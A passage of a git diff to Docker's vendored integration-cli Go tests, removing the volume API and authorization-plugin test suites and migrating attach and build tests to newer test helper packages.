a/vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go +++ /dev/null @@ -1,89 +0,0 @@ -package main - -import ( - "encoding/json" - "net/http" - "path/filepath" - - "github.com/docker/docker/api/types" - volumetypes "github.com/docker/docker/api/types/volume" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestVolumesAPIList(c *check.C) { - prefix, _ := getPrefixAndSlashFromDaemonPlatform() - dockerCmd(c, "run", "-v", prefix+"/foo", "busybox") - - status, b, err := sockRequest("GET", "/volumes", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - - var volumes volumetypes.VolumesListOKBody - c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) - - c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) -} - -func (s *DockerSuite) TestVolumesAPICreate(c *check.C) { - config := volumetypes.VolumesCreateBody{ - Name: "test", - } - status, b, err := sockRequest("POST", "/volumes/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b))) - - var vol types.Volume - err = json.Unmarshal(b, &vol) - c.Assert(err, checker.IsNil) - - c.Assert(filepath.Base(filepath.Dir(vol.Mountpoint)), checker.Equals, config.Name) -} - -func (s *DockerSuite) TestVolumesAPIRemove(c *check.C) { - prefix, _ := getPrefixAndSlashFromDaemonPlatform() - dockerCmd(c, "run", "-v", prefix+"/foo", "--name=test", "busybox") - - status, b, err := sockRequest("GET", "/volumes", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - - var volumes volumetypes.VolumesListOKBody - c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) - c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) - - v := volumes.Volumes[0] - status, _, err = sockRequest("DELETE", "/volumes/"+v.Name, nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusConflict, check.Commentf("Should not be able to remove a volume that is in use")) - - dockerCmd(c, "rm", "-f", "test") - status, data, err := sockRequest("DELETE", "/volumes/"+v.Name, nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf(string(data))) - -} - -func (s *DockerSuite) TestVolumesAPIInspect(c *check.C) { - config := volumetypes.VolumesCreateBody{ - Name: "test", - } - status, b, err := sockRequest("POST", "/volumes/create", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusCreated, check.Commentf(string(b))) - - status, b, err = sockRequest("GET", "/volumes", nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b))) - - var volumes volumetypes.VolumesListOKBody - c.Assert(json.Unmarshal(b, &volumes), checker.IsNil) - c.Assert(len(volumes.Volumes), checker.Equals, 1, check.Commentf("\n%v", volumes.Volumes)) - - var vol types.Volume - status, b, err = sockRequest("GET", "/volumes/"+config.Name, nil) - c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf(string(b))) - c.Assert(json.Unmarshal(b, &vol), checker.IsNil) - c.Assert(vol.Name, checker.Equals, config.Name) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go index 2df4fdc4d2..ef2c708bbe 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_test.go @@ -10,8 +10,9 @@ import ( "sync" "time" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" + "gotest.tools/icmd" ) const attachWait = 5 * time.Second @@ -22,8 +23,8 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) { endGroup.Add(3) startGroup.Add(3) - err := waitForContainer("attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done") - c.Assert(err, check.IsNil) + cli.DockerCmd(c, "run", "--name", "attacher", "-d", "busybox", "/bin/sh", "-c", "while true; do sleep 1; echo hello; done") + cli.WaitRun(c, "attacher") startDone := make(chan struct{}) endDone := make(chan struct{}) @@ -77,7 +78,7 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) { c.Fatalf("Attaches did not initialize properly") } - dockerCmd(c, "kill", "attacher") + cli.DockerCmd(c, "kill", "attacher") select { case <-endDone: @@ -87,6 +88,14 @@ func (s *DockerSuite) TestAttachMultipleAndRestart(c *check.C) { } func (s *DockerSuite) TestAttachTTYWithoutStdin(c *check.C) { + // TODO @jhowardmsft. Figure out how to get this running again reliable on Windows. + // It works by accident at the moment. Sometimes. I've gone back to v1.13.0 and see the same. + // On Windows, docker run -d -ti busybox causes the container to exit immediately. + // Obviously a year back when I updated the test, that was not the case. However, + // with this, and the test racing with the tear-down which panic's, sometimes CI + // will just fail and `MISS` all the other tests. For now, disabling it. Will + // open an issue to track re-enabling this and root-causing the problem. + testRequires(c, DaemonIsLinux) out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox") id := strings.TrimSpace(out) @@ -138,7 +147,10 @@ func (s *DockerSuite) TestAttachDisconnect(c *check.C) { c.Assert(err, check.IsNil) defer stdout.Close() c.Assert(cmd.Start(), check.IsNil) - defer cmd.Process.Kill() + defer func() { + cmd.Process.Kill() + cmd.Wait() + }() _, err = stdin.Write([]byte("hello\n")) c.Assert(err, check.IsNil) @@ -155,12 +167,11 @@ func (s *DockerSuite) TestAttachDisconnect(c *check.C) { func (s *DockerSuite) TestAttachPausedContainer(c *check.C) { testRequires(c, IsPausable) - defer unpauseAllContainers() runSleepingContainer(c, "-d", "--name=test") dockerCmd(c, "pause", "test") result := dockerCmdWithResult("attach", "test") - c.Assert(result, icmd.Matches, icmd.Expected{ + result.Assert(c, icmd.Expected{ Error: "exit status 1", ExitCode: 1, Err: "You cannot attach to a paused container, unpause it first", diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go index fb794ccc40..9affb944b1 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_attach_unix_test.go @@ -9,7 +9,7 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/stringid" "github.com/go-check/check" "github.com/kr/pty" @@ -69,10 +69,10 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { cmd.Stdout = tty cmd.Stderr = tty - errChan := make(chan error) + cmdExit := make(chan error) go func() { - errChan <- cmd.Run() - close(errChan) + cmdExit <- cmd.Run() + close(cmdExit) }() c.Assert(waitRun(name), check.IsNil) @@ -82,12 +82,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { cpty.Write([]byte{17}) select { - case err := <-errChan: - if err != nil { - buff := make([]byte, 200) - tty.Read(buff) - c.Fatalf("%s: %s", err, buff) - } + case <-cmdExit: case <-time.After(5 * time.Second): c.Fatal("timeout while detaching") } @@ -102,6 +97,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { err = cmd.Start() c.Assert(err, checker.IsNil) + defer cmd.Process.Kill() bytes := make([]byte, 10) var nBytes int @@ -124,11 +120,7 @@ func (s *DockerSuite) TestAttachAfterDetach(c *check.C) { c.Fatal("timeout waiting for attach read") } - err = cmd.Wait() - c.Assert(err, checker.IsNil) - c.Assert(string(bytes[:nBytes]), checker.Contains, "/ #") - } // TestAttachDetach checks that attach in tty mode can be detached using the long container ID @@ -173,7 +165,7 @@ func (s *DockerSuite) TestAttachDetach(c *check.C) { c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) go func() { - dockerCmd(c, "kill", id) + dockerCmdWithResult("kill", id) }() select { @@ -225,7 +217,7 @@ func (s *DockerSuite) TestAttachDetachTruncatedID(c *check.C) { c.Assert(running, checker.Equals, "true", check.Commentf("expected container to still be running")) go func() { - dockerCmd(c, "kill", id) + dockerCmdWithResult("kill", id) }() select { diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go deleted file mode 100644 index 8a669fb379..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go +++ /dev/null @@ -1,133 +0,0 @@ -// +build !windows - -package main - -import ( - "fmt" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -var ( - authzPluginName = "riyaz/authz-no-volume-plugin" - authzPluginTag = "latest" - authzPluginNameWithTag = authzPluginName + ":" + authzPluginTag - authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest" - nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin" -) - -func init() { - check.Suite(&DockerAuthzV2Suite{ - ds: &DockerSuite{}, - }) -} - -type DockerAuthzV2Suite struct { - ds *DockerSuite - d *Daemon -} - -func (s *DockerAuthzV2Suite) SetUpTest(c *check.C) { - testRequires(c, DaemonIsLinux, Network) - s.d = NewDaemon(c) - c.Assert(s.d.Start(), check.IsNil) -} - -func (s *DockerAuthzV2Suite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) -} - -func (s *DockerAuthzV2Suite) TestAuthZPluginAllowNonVolumeRequest(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - // Install authz plugin - _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - // start the daemon with the plugin and load busybox, --net=none build fails otherwise - // because it needs to pull busybox - c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil) - c.Assert(s.d.LoadBusybox(), check.IsNil) - - // defer disabling the plugin - defer func() { - c.Assert(s.d.Restart(), check.IsNil) - _, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - _, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - }() - - // Ensure docker run command and accompanying docker ps are successful - out, err := s.d.Cmd("run", "-d", "busybox", "top") - c.Assert(err, check.IsNil) - - id := strings.TrimSpace(out) - - out, err = s.d.Cmd("ps") - c.Assert(err, check.IsNil) - c.Assert(assertContainerList(out, []string{id}), check.Equals, true) -} - -func (s *DockerAuthzV2Suite) TestAuthZPluginRejectVolumeRequests(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - // Install authz plugin - _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - - // restart the daemon with the plugin - c.Assert(s.d.Restart("--authorization-plugin="+authzPluginNameWithTag), check.IsNil) - - // defer disabling the plugin - defer func() { - c.Assert(s.d.Restart(), check.IsNil) - _, err = s.d.Cmd("plugin", "disable", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - _, err = s.d.Cmd("plugin", "rm", authzPluginNameWithTag) - c.Assert(err, checker.IsNil) - }() - - out, err := s.d.Cmd("volume", "create") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) - - out, err = s.d.Cmd("volume", "ls") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) - - // The plugin will block the command before it can determine the volume does not exist - out, err = s.d.Cmd("volume", "rm", "test") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) - - out, err = s.d.Cmd("volume", "inspect", "test") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) - - out, err = s.d.Cmd("volume", "prune", "-f") - c.Assert(err, check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) -} - -func (s *DockerAuthzV2Suite) TestAuthZPluginBadManifestFailsDaemonStart(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - // Install authz plugin with bad manifest - _, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", authzPluginBadManifestName) - c.Assert(err, checker.IsNil) - - // start the daemon with the plugin, it will error - c.Assert(s.d.Restart("--authorization-plugin="+authzPluginBadManifestName), check.NotNil) - - // restarting the daemon without requiring the plugin will succeed - c.Assert(s.d.Restart(), check.IsNil) -} - -func (s *DockerAuthzV2Suite) TestNonexistentAuthZPluginFailsDaemonStart(c *check.C) { - testRequires(c, DaemonIsLinux, Network) - // start the daemon with a non-existent authz plugin, it will error - c.Assert(s.d.Restart("--authorization-plugin="+nonexistentAuthzPluginName), check.NotNil) - - // restarting the daemon without requiring the plugin will succeed - c.Assert(s.d.Restart(), check.IsNil) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go deleted file mode 100644 index a826249e2e..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go +++ /dev/null @@ -1,477 +0,0 @@ -// +build !windows - -package main - -import ( - "encoding/json" - "fmt" - "io/ioutil" - "net/http" - "net/http/httptest" - "os" - "path/filepath" - "strings" - - "bufio" - "bytes" - "os/exec" - "strconv" - "time" - - "net" - "net/http/httputil" - "net/url" - - "github.com/docker/docker/pkg/authorization" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/plugins" - "github.com/go-check/check" -) - -const ( - testAuthZPlugin = "authzplugin" - unauthorizedMessage = "User unauthorized authz plugin" - errorMessage = "something went wrong..." - containerListAPI = "/containers/json" -) - -var ( - alwaysAllowed = []string{"/_ping", "/info"} -) - -func init() { - check.Suite(&DockerAuthzSuite{ - ds: &DockerSuite{}, - }) -} - -type DockerAuthzSuite struct { - server *httptest.Server - ds *DockerSuite - d *Daemon - ctrl *authorizationController -} - -type authorizationController struct { - reqRes authorization.Response // reqRes holds the plugin response to the initial client request - resRes authorization.Response // resRes holds the plugin response to the daemon response - psRequestCnt int // psRequestCnt counts the number of calls to list container request api - psResponseCnt int // psResponseCnt counts the number of calls to list containers response API - requestsURIs []string // requestsURIs stores all request URIs that are sent to the authorization controller - reqUser string - resUser string -} - -func (s *DockerAuthzSuite) SetUpTest(c *check.C) { - s.d = NewDaemon(c) - s.ctrl = &authorizationController{} -} - -func (s *DockerAuthzSuite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) - s.ctrl = nil -} - -func (s *DockerAuthzSuite) SetUpSuite(c *check.C) { - mux := http.NewServeMux() - s.server = httptest.NewServer(mux) - - mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { - b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}}) - c.Assert(err, check.IsNil) - w.Write(b) - }) - - mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) { - defer r.Body.Close() - body, err := ioutil.ReadAll(r.Body) - c.Assert(err, check.IsNil) - authReq := authorization.Request{} - err = json.Unmarshal(body, &authReq) - c.Assert(err, check.IsNil) - - assertBody(c, authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody) - assertAuthHeaders(c, authReq.RequestHeaders) - - // Count only container list api - if strings.HasSuffix(authReq.RequestURI, containerListAPI) { - s.ctrl.psRequestCnt++ - } - - s.ctrl.requestsURIs = append(s.ctrl.requestsURIs, authReq.RequestURI) - - reqRes := s.ctrl.reqRes - if isAllowed(authReq.RequestURI) { - reqRes = authorization.Response{Allow: true} - } - if reqRes.Err != "" { - w.WriteHeader(http.StatusInternalServerError) - } - b, err := json.Marshal(reqRes) - c.Assert(err, check.IsNil) - s.ctrl.reqUser = authReq.User - w.Write(b) - }) - - mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) { - defer r.Body.Close() - body, err := ioutil.ReadAll(r.Body) - c.Assert(err, check.IsNil) - authReq := authorization.Request{} - err = json.Unmarshal(body, &authReq) - c.Assert(err, check.IsNil) - - assertBody(c, authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody) - assertAuthHeaders(c, authReq.ResponseHeaders) - - // Count only container list api - if strings.HasSuffix(authReq.RequestURI, containerListAPI) { - s.ctrl.psResponseCnt++ - } - resRes := s.ctrl.resRes - if isAllowed(authReq.RequestURI) { - resRes = authorization.Response{Allow: true} - } - if resRes.Err != "" { - w.WriteHeader(http.StatusInternalServerError) - } - b, err := json.Marshal(resRes) - c.Assert(err, check.IsNil) - s.ctrl.resUser = authReq.User - w.Write(b) - }) - - err := os.MkdirAll("/etc/docker/plugins", 0755) - c.Assert(err, checker.IsNil) - - fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin) - err = ioutil.WriteFile(fileName, []byte(s.server.URL), 0644) - c.Assert(err, checker.IsNil) -} - -// check for always allowed endpoints to not inhibit test framework functions -func isAllowed(reqURI string) bool { - for _, endpoint := range alwaysAllowed { - if strings.HasSuffix(reqURI, endpoint) { - return true - } - } - return false -} - -// assertAuthHeaders validates authentication headers are removed -func assertAuthHeaders(c *check.C, headers map[string]string) error { - for k := range headers { - if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") { - c.Errorf("Found authentication headers in request '%v'", headers) - } - } - return nil -} - -// assertBody asserts that body is removed for non text/json requests -func assertBody(c *check.C, requestURI string, headers map[string]string, body []byte) { - if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 { - //return fmt.Errorf("Body included for authentication endpoint %s", string(body)) - c.Errorf("Body included for authentication endpoint %s", string(body)) - } - - for k, v := range headers { - if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" { - return - } - } - if len(body) > 0 { - c.Errorf("Body included while it should not (Headers: '%v')", headers) - } -} - -func (s *DockerAuthzSuite) TearDownSuite(c *check.C) { - if s.server == nil { - return - } - - s.server.Close() - - err := os.RemoveAll("/etc/docker/plugins") - c.Assert(err, checker.IsNil) -} - -func (s *DockerAuthzSuite) TestAuthZPluginAllowRequest(c *check.C) { - // start the daemon and load busybox, --net=none build fails otherwise - // cause it needs to pull busybox - c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - c.Assert(s.d.LoadBusybox(), check.IsNil) - - // Ensure command successful - out, err := s.d.Cmd("run", "-d", "busybox", "top") - c.Assert(err, check.IsNil) - - id := strings.TrimSpace(out) - assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create") - assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", id)) - - out, err = s.d.Cmd("ps") - c.Assert(err, check.IsNil) - c.Assert(assertContainerList(out, []string{id}), check.Equals, true) - c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) - c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) -} - -func (s *DockerAuthzSuite) TestAuthZPluginTls(c *check.C) { - - const testDaemonHTTPSAddr = "tcp://localhost:4271" - // start the daemon and load busybox, --net=none build fails otherwise - // cause it needs to pull busybox - if err := s.d.Start( - "--authorization-plugin="+testAuthZPlugin, - "--tlsverify", - "--tlscacert", - "fixtures/https/ca.pem", - "--tlscert", - "fixtures/https/server-cert.pem", - "--tlskey", - "fixtures/https/server-key.pem", - "-H", testDaemonHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } - - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - - out, _ := dockerCmd( - c, - "--tlsverify", - "--tlscacert", "fixtures/https/ca.pem", - "--tlscert", "fixtures/https/client-cert.pem", - "--tlskey", "fixtures/https/client-key.pem", - "-H", - testDaemonHTTPSAddr, - "version", - ) - if !strings.Contains(out, "Server") { - c.Fatalf("docker version should return information of server side") - } - - c.Assert(s.ctrl.reqUser, check.Equals, "client") - c.Assert(s.ctrl.resUser, check.Equals, "client") -} - -func (s *DockerAuthzSuite) TestAuthZPluginDenyRequest(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Allow = false - s.ctrl.reqRes.Msg = unauthorizedMessage - - // Ensure command is blocked - res, err := s.d.Cmd("ps") - c.Assert(err, check.NotNil) - c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) - c.Assert(s.ctrl.psResponseCnt, check.Equals, 0) - - // Ensure unauthorized message appears in response - c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage)) -} - -// TestAuthZPluginAPIDenyResponse validates that when authorization plugin deny the request, the status code is forbidden -func (s *DockerAuthzSuite) TestAuthZPluginAPIDenyResponse(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Allow = false - s.ctrl.resRes.Msg = unauthorizedMessage - - daemonURL, err := url.Parse(s.d.sock()) - - conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) - c.Assert(err, check.IsNil) - client := httputil.NewClientConn(conn, nil) - req, err := http.NewRequest("GET", "/version", nil) - c.Assert(err, check.IsNil) - resp, err := client.Do(req) - - c.Assert(err, check.IsNil) - c.Assert(resp.StatusCode, checker.Equals, http.StatusForbidden) - c.Assert(err, checker.IsNil) -} - -func (s *DockerAuthzSuite) TestAuthZPluginDenyResponse(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = false - s.ctrl.resRes.Msg = unauthorizedMessage - - // Ensure command is blocked - res, err := s.d.Cmd("ps") - c.Assert(err, check.NotNil) - c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) - c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) - - // Ensure unauthorized message appears in response - c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage)) -} - -// TestAuthZPluginAllowEventStream verifies event stream propagates correctly after request pass through by the authorization plugin -func (s *DockerAuthzSuite) TestAuthZPluginAllowEventStream(c *check.C) { - testRequires(c, DaemonIsLinux) - - // start the daemon and load busybox to avoid pulling busybox from Docker Hub - c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - c.Assert(s.d.LoadBusybox(), check.IsNil) - - startTime := strconv.FormatInt(daemonTime(c).Unix(), 10) - // Add another command to to enable event pipelining - eventsCmd := exec.Command(dockerBinary, "--host", s.d.sock(), "events", "--since", startTime) - stdout, err := eventsCmd.StdoutPipe() - if err != nil { - c.Assert(err, check.IsNil) - } - - observer := eventObserver{ - buffer: new(bytes.Buffer), - command: eventsCmd, - scanner: bufio.NewScanner(stdout), - startTime: startTime, - } - - err = observer.Start() - c.Assert(err, checker.IsNil) - defer observer.Stop() - - // Create a container and wait for the creation events - out, err := s.d.Cmd("run", "-d", "busybox", "top") - c.Assert(err, check.IsNil, check.Commentf(out)) - containerID := strings.TrimSpace(out) - c.Assert(s.d.waitRun(containerID), checker.IsNil) - - events := map[string]chan bool{ - "create": make(chan bool, 1), - "start": make(chan bool, 1), - } - - matcher := matchEventLine(containerID, "container", events) - processor := processEventMatch(events) - go observer.Match(matcher, processor) - - // Ensure all events are received - for event, eventChannel := range events { - - select { - case <-time.After(30 * time.Second): - // Fail the test - observer.CheckEventError(c, containerID, event, matcher) - c.FailNow() - case <-eventChannel: - // Ignore, event received - } - } - - // Ensure both events and container endpoints are passed to the authorization plugin - assertURIRecorded(c, s.ctrl.requestsURIs, "/events") - assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create") - assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", containerID)) -} - -func (s *DockerAuthzSuite) TestAuthZPluginErrorResponse(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Err = errorMessage - - // Ensure command is blocked - res, err := s.d.Cmd("ps") - c.Assert(err, check.NotNil) - - c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage)) -} - -func (s *DockerAuthzSuite) TestAuthZPluginErrorRequest(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Err = errorMessage - - // Ensure command is blocked - res, err := s.d.Cmd("ps") - c.Assert(err, check.NotNil) - - c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage)) -} - -func (s *DockerAuthzSuite) TestAuthZPluginEnsureNoDuplicatePluginRegistration(c *check.C) { - c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil) - - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - - out, err := s.d.Cmd("ps") - c.Assert(err, check.IsNil, check.Commentf(out)) - - // assert plugin is only called once.. - c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) - c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) -} - -func (s *DockerAuthzSuite) TestAuthZPluginEnsureLoadImportWorking(c *check.C) { - c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - c.Assert(s.d.LoadBusybox(), check.IsNil) - - tmp, err := ioutil.TempDir("", "test-authz-load-import") - c.Assert(err, check.IsNil) - defer os.RemoveAll(tmp) - - savedImagePath := filepath.Join(tmp, "save.tar") - - out, err := s.d.Cmd("save", "-o", savedImagePath, "busybox") - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = s.d.Cmd("load", "--input", savedImagePath) - c.Assert(err, check.IsNil, check.Commentf(out)) - - exportedImagePath := filepath.Join(tmp, "export.tar") - - out, err = s.d.Cmd("run", "-d", "--name", "testexport", "busybox") - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = s.d.Cmd("export", "-o", exportedImagePath, "testexport") - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = s.d.Cmd("import", exportedImagePath) - c.Assert(err, check.IsNil, check.Commentf(out)) -} - -func (s *DockerAuthzSuite) TestAuthZPluginHeader(c *check.C) { - c.Assert(s.d.Start("--debug", "--authorization-plugin="+testAuthZPlugin), check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - c.Assert(s.d.LoadBusybox(), check.IsNil) - - daemonURL, err := url.Parse(s.d.sock()) - - conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) - c.Assert(err, check.IsNil) - client := httputil.NewClientConn(conn, nil) - req, err := http.NewRequest("GET", "/version", nil) - c.Assert(err, check.IsNil) - resp, err := client.Do(req) - - c.Assert(err, check.IsNil) - c.Assert(resp.Header["Content-Type"][0], checker.Equals, "application/json") -} - -// assertURIRecorded verifies that the given URI was sent and recorded in the authz plugin -func assertURIRecorded(c *check.C, uris []string, uri string) { - var found bool - for _, u := range uris { - if strings.Contains(u, uri) { - found = true - break - } - } - if !found { - c.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ",")) - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go index 49c1062c25..1e88b1ba39 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go @@ -7,7 +7,6 @@ import ( "fmt" "io/ioutil" "os" - "os/exec" "path/filepath" "reflect" "regexp" @@ -17,58 +16,44 @@ import ( "text/template" "time" - "github.com/docker/docker/builder/dockerfile/command" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/fakegit" + "github.com/docker/docker/internal/test/fakestorage" + "github.com/docker/docker/internal/testutil" "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/stringutils" "github.com/go-check/check" + "github.com/moby/buildkit/frontend/dockerfile/command" + "github.com/opencontainers/go-digest" + "gotest.tools/icmd" ) func (s *DockerSuite) TestBuildJSONEmptyRun(c *check.C) { - name := "testbuildjsonemptyrun" - - _, err := buildImage( - name, - ` + cli.BuildCmd(c, "testbuildjsonemptyrun", build.WithDockerfile(` FROM busybox RUN [] - `, - true) - - if err != nil { - c.Fatal("error when dealing with a RUN statement with empty JSON array") - } - + `)) } func (s *DockerSuite) TestBuildShCmdJSONEntrypoint(c *check.C) { name := "testbuildshcmdjsonentrypoint" + expected := "/bin/sh -c echo test" + if testEnv.OSType == "windows" { + expected = "cmd /S /C echo test" + } - _, err := buildImage( 